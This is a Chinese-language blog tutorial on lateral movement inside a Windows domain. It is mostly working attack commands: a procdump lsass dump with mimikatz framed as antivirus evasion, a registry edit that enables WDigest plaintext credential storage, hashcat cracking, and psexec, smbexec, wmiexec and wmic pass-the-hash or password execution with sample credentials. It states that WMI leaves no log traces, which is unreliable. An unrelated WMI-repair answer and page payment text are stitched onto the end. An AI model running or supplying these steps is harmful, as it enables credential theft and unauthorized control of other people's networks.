【内网渗透】域横向smb&wmi明文或hash传递


0x001 Procdump+Mimikatz配合获取用户信息

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

Procdump下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

# procdump 在目标机上执行
procdump -accepteula -ma lsass.exe lsass.dmp

# mimikatz 在本地执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

0x002 无法获取明文密码解决方案

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  • 1.利用哈希hash传递(pth,ptk等)进行移动
  • 2.利用其它服务协议(SMB,WMI等)进行哈希移动
  • 3.利用注册表操作开启Wdigest Auth值进行获取
  • 4.利用工具或第三方平台(Hachcat)进行破解获取
1)hashcat暴力破解

Windows系统LM HashNTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash

hashcat -a 0 -m 1000 hash file --force

破解工具:https://github.com/hashcat/hashcat
更多参考:https://www.freebuf.com/sectool/164507.html

2)注册表操作开启Wdigest Auth值
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
3)SMB服务协议进行哈希移动

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放

# psexec第一种:先有ipc链接,psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

# psexec第二种:不用建立IPC直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32  // 实际操作中连接不上
// 以上两种方式使用的官方Pstools内的工具    

# smbexec第三种:无需先ipc链接 明文或hash传递  非官方自带-参考impacket工具包使用,操作简单,容易被杀
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

Pstools官方工具包:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

impacket工具包下载:https://gitee.com/RichChigga/impacket-examples-windows

4)WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

# 自带WMIC命令 明文传递 无回显   
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:\1.txt"

# 自带cscript配合wmiexec.vbs脚本 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

# 第三方套件impacket wmiexec  明文或hash传递 有回显exe版本  容易被杀软查杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

wmiexec.vbs脚本下载:https://www.secpulse.com/wp-content/uploads/2015/05/cache-a360611dc24d240989799c29c555e4b7_wmiexec-v1_1.rar

参考文章:http://www.91ri.org/12908.html

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
这个错误通常与 WMI(Windows Management Instrumentation)服务相关,可能是 WMI 子系统或命名空间出现了问题。以下是一些可能的解决方法: 1. 重新启动 WMI 服务 在 Windows 搜索栏中输入“services.msc”,找到“Windows Management Instrumentation”服务,右键单击并选择“重启”。 2. 重置 WMI 服务 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` winmgmt /resetrepository ``` 这将重置 WMI 子系统的状态并重新构建 WMI 数据存储库。 3. 修复 WMI 子系统 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` winmgmt /salvagerepository %windir%\System32\wbem ``` 这将尝试修复损坏的 WMI 子系统文件,并将它们移动到重建存储库所需的位置。 4. 重新注册 WMI DLL 文件 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` regsvr32 wbemcons.dll regsvr32 wbemcore.dll regsvr32 wbemess.dll regsvr32 wbemsvc.dll regsvr32 fastprox.dll regsvr32 winmgmts.exe ``` 这将重新注册 WMI DLL 文件,可能会解决问题。 5. 运行系统文件检查器 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` sfc /scannow ``` 这将运行系统文件检查器,并尝试修复任何受损的系统文件。 如果上述解决方法都无法解决问题,可能需要重新安装操作系统或寻求专业技术支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值